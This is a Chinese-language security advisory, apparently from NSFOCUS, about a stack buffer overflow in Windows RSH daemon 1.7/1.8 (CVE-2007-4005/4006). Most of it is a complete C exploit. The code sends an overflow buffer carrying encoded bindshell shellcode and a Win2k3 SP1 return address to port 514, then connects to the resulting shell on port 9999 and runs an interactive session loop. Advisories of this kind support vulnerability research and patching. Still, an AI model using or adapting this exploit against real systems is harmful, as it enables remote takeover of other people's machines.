安全研究
安全漏洞
Windows RSH daemon栈缓冲器溢出漏洞
发布日期:2007-07-24
更新日期:2007-01-22
受影响系统:
Microsoft Windows RSH daemon 1.8描述:
Microsoft Windows RSH daemon 1.7
BUGTRAQ ID: 25044
CVE(CAN) ID: CVE-2007-4005,CVE-2007-4006
Windows RSH daemon是一个多线程的守护进程服务。
Windows RSH daemon在实现上存在栈缓冲器溢出漏洞,攻击者可利用此漏洞执行任意代码。
<*来源:Joey Mengele (joey.mengele@hushmail.com)
链接:http://osvdb.org/show/osvdb/38572
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#define ESIZ 1 + 1 + 1 + 1 + 1 + 1028
int
main (int argc, char *argv[])
{
unsigned char win32_bindshell[] = // 9999 tcp
"AAAAAAAAAAAAA"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66"
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32"
"\x4a\x7a\x4b\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75"
"\x30\x6e\x6b\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e"
"\x6b\x33\x4c\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56"
"\x78\x6e\x6b\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36"
"\x54\x4e\x6b\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d"
"\x54\x4b\x70\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f"
"\x32\x7a\x4b\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b"
"\x55\x4c\x4b\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46"
"\x6c\x30\x4b\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54"
"\x6c\x4c\x4b\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74"
"\x71\x4b\x6b\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36"
"\x6c\x4c\x4b\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31"
"\x4e\x42\x48\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49"
"\x46\x75\x36\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74"
"\x37\x54\x33\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38"
"\x4b\x38\x6d\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f"
"\x79\x4d\x35\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61"
"\x7a\x46\x62\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c"
"\x6d\x41\x47\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70"
"\x53\x51\x53\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62"
"\x48\x36\x47\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31"
"\x78\x6e\x44\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70"
"\x6a\x74\x50\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e"
"\x4d\x64\x6e\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39"
"\x6f\x58\x50\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39"
"\x6f\x79\x46\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a"
"\x33\x51\x78\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e"
"\x36\x51\x45\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72"
"\x48\x30\x63\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37"
"\x59\x58\x4c\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55"
"\x61\x4f\x30\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47"
"\x32\x34\x6c\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c"
"\x6b\x75\x38\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41"
"\x54\x59\x6f\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52"
"\x71\x51\x7a\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e"
"\x30\x50\x68\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a"
"\x76\x50\x6a\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32"
"\x77\x39\x6c\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79"
"\x6f\x6e\x30\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b"
"\x4f\x48\x56\x79\x6f\x4e\x30\x66";
char *buf;
int *ptr;
int i, c, sck;
struct sockaddr_in address;
struct hostent *hp;
if (argc < 2)
{
printf ("usage: %s address\n", argv[0]);
exit (-1);
}
// lsd-pl arrayd.c
sck = socket (AF_INET, SOCK_STREAM, 0);
bzero (&address, sizeof (address));
address.sin_family = AF_INET;
address.sin_port = htons (514);
if (0 !=
bind (sck, (struct sockaddr *) &address, sizeof (struct
sockaddr_in)))
{
perror ("bind");
exit (-344);
}
if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
{
if ((hp = gethostbyname (argv[1])) == NULL)
{
errno = EADDRNOTAVAIL;
perror ("error");
exit (-1);
}
memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
}
if (connect (sck, (struct sockaddr *) &address, sizeof (address))
< 0)
{
perror ("error");
exit (-1);
}
buf = malloc (ESIZ);
memcpy (buf, "\x00\x41\x00\x41\x00", 5);
memset (buf + 5, 0x41, 1028);
memcpy (buf + 5, win32_bindshell, sizeof (win32_bindshell) - 1);
ptr = (int *) (buf + 5 + 1024);
*ptr = 0x71ae36b7; // call esi in wshtcpip in win2k3
SP1
write (sck, buf, ESIZ);
close (sck);
sleep (1);
sck = socket (AF_INET, SOCK_STREAM, 0);
bzero (&address, sizeof (address));
address.sin_family = AF_INET;
address.sin_port = htons (9999);
if ((address.sin_addr.s_addr = inet_addr (argv[1])) == -1)
{
if ((hp = gethostbyname (argv[1])) == NULL)
{
errno = EADDRNOTAVAIL;
perror ("error");
exit (-1);
}
memcpy (&address.sin_addr.s_addr, hp->h_addr, 4);
}
if (connect (sck, (struct sockaddr *) &address, sizeof (address))
< 0)
{
perror ("error");
exit (-1);
}
do_shell (sck);
}
// cvs_linux_freebsd_HEAP.c
int
do_shell (int sockfd)
{
while (1)
{
fd_set fds;
FD_ZERO (&fds);
FD_SET (0, &fds);
FD_SET (sockfd, &fds);
if (select (FD_SETSIZE, &fds, NULL, NULL, NULL))
{
int cnt;
char buf[1024];
if (FD_ISSET (0, &fds))
{
if ((cnt = read (0, buf, 1024)) < 1)
{
if (errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
break;
}
write (sockfd, buf, cnt);
}
if (FD_ISSET (sockfd, &fds))
{
if ((cnt = read (sockfd, buf, 1024)) < 1)
{
if (errno == EWOULDBLOCK || errno == EAGAIN)
continue;
else
break;
}
write (1, buf, cnt);
}
}
}
}
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
浏览次数:2142
严重程度:0(网友投票)
绿盟科技给您安全的保障